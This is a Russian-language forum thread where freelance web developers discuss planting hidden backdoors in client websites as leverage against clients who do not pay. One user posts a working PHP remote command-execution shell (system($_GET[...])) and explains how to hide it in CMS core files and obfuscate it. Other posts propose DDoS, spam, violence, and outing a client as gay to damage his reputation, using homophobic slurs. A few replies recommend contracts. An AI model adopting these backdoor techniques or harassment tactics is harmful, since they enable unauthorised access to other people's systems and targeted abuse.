Как защитить свой труд от кидалова заказчика?

[weranda]

Поделись как это делать!!!
У меня в шелах опыта нет.

Тут показано как это примерно делается:

Тут можно найти пару шеллов для Jommla: Для просмотра ссылки Войди или Зарегистрируйся
Но это только то, что плавает на поверхности, всяких вариантов — масса. Можно даже заказать
Суть такова: почти в любой файл встраивается код, используя который можно тем или иным способом получить доступ к другим файлам и БД, даже если нерадивый клиент заблокировал вам доступ к ним. Если в шеллах не сечете, то подождите ответа тут, может быть, кто-то и расскажет вам более подробно, либо можете заказать шелл по нужному вами алгоритму на фрилансе.

 

[Feldeshi]

У меня были шелы просто отдельные файлы, прятал как можно дальше в шаблоне, и давал имена вроде styletheme.php я поищу на старых хардах может что найду, очень давно не пользовался ими.

 

[prefer]

Надо учитывать что на любом нормальном хостинге делаются резервные копии сайта.
По запросу владельца при помощи них сайт будет восстановлен.
Так что лучше смотреть в сторону правильных ТЗ,договоров и адекватных заказчиков.

 

[Feldeshi]

Надо учитывать что на любом нормальном хостинге делаются резервные копии сайта.
По запросу владельца при помощи них сайт будет восстановлен.
Так что лучше смотреть в сторону правильных ТЗ,договоров и адекватных заказчиков.

Ну по сути да, но в основном скажу что 90% заказчиков даже с трудом понимают что такое хостинг)

 

[world-tour]

У меня были шелы просто отдельные файлы, прятал как можно дальше в шаблоне, и давал имена вроде styletheme.php я поищу на старых хардах может что найду, очень давно не пользовался ими.

Это слишком заметно, такие может и сам хостер убить.(типо айболитом прогнать раз в неделю)
Лучше встраивать в какой-нибудь системный файл самой CMS/CMF который доступен из вне

<?php
system($_GET['csrf_fake']);
?>

Понятное дело что и тот же айболит найдёт)) Но тут суть в том что если найдёт то убьет системный файл (например запихнуть в core.php какой нить)
Для банального примера, вставляем в тот же index.php среди строк

system($_GET['csrf_fake']);

И потом просто обращаться к сайту: site.ru/index.php?csrf_fake=КОММАНДы терминала, а там можно что угодно уже делать.

Конечно можно сказать авось эти функции отключены на хосте и потому не сработает(таких хостов мало) и то что строку можно хоть в base64 хоть в eval и еще тьму вариантов загнать, это дело лично каждого в зависимости от навыков и знаний в этой сфере.

А так конечно можно и под тот же ioncube загонять с этой же строкой файлы системы (хоть с привязкой к MAC адресу и домену)
Вариантов тьма

PS> Если кто-то серьезно заинтересован в подобном пишите в ЛС (за пиво) сообразим))

 

[Гинзбург]

Надо учитывать что на любом нормальном хостинге делаются резервные копии сайта.
По запросу владельца при помощи них сайт будет восстановлен.
Так что лучше смотреть в сторону правильных ТЗ,договоров и адекватных заказчиков.

Это конечно идеальный вариант и в основном так и работаем, но иногда попадаются представители секс меньшинств. У меня за 10 лет второй раз. И вроде сумма небольшая, но как выяснилось, он и не собирался платить изначально. Потом я выдавил из него $10 из $50. Но наказать хотя бы морально надо.
Я предполагаю испортить ему репутацию, так как в его небольшом городке его многие знают. Через соцсети сделать его представителем ЛГБТ. Ну и все знакомые и не только в городе об этом узнают.

На сайт, который я ему правил доступа нет.

Если есть альтернативные варианты - предложите!

 

[weranda]

Если есть альтернативные варианты - предложи

Заддосить его хост, заспамить почту, мессенджеры, телефон, написать заяву копам, трахнуть его, чтоб весь ютьюб услышал или въе*ать ему так, чтобы зубы по всей остановке разлетелись, заблокировать телефоны (тут где-то была тема, чел помогал добыть инфу, может и заблокировать поможет), нанять коллекторов...ну а по делу, пид***сов (это не о геях) надо наказывать, но иногда стоит смириться с тем, что есть такие типы и вынести из этого для себя урок.

 

[Feldeshi]

Заддосить его хост, заспамить почту, мессенджеры, телефон, написать заяву копам, трахнуть его, чтоб весь ютьюб услышал или въе*ать ему так, чтобы зубы по всей остановке разлетелись, заблокировать телефоны (тут где-то была тема, чел помогал добыть инфу, может и заблокировать поможет), нанять коллекторов...ну а по делу, пид***сов (это не о геях) надо наказывать, но иногда стоит смириться с тем, что есть такие типы и вынести из этого для себя урок.

Человек выше чертовски прав, но и с капелькой еба*утости)

 

[Feldeshi]

Для просмотра ссылки Войди или Зарегистрируйся
Вот можно на этом примере накидать Шелл одним файлом...

 

[RORC]

Шелы - из-за 50$-100$ под неправомерный доступ к информации? Спам, ддос и т.п. - больше времени потеряешь, чем отдача. Хотя есть такие, которым и за бесплатно сделаешь, но обычно редкое исключение.

Лучше сервер лицензий сделать, на том же гитхабе есть беслпатные, нужен только хостинг. Выдавать ключи доступа, сам код, под куб или хороший обфускатор.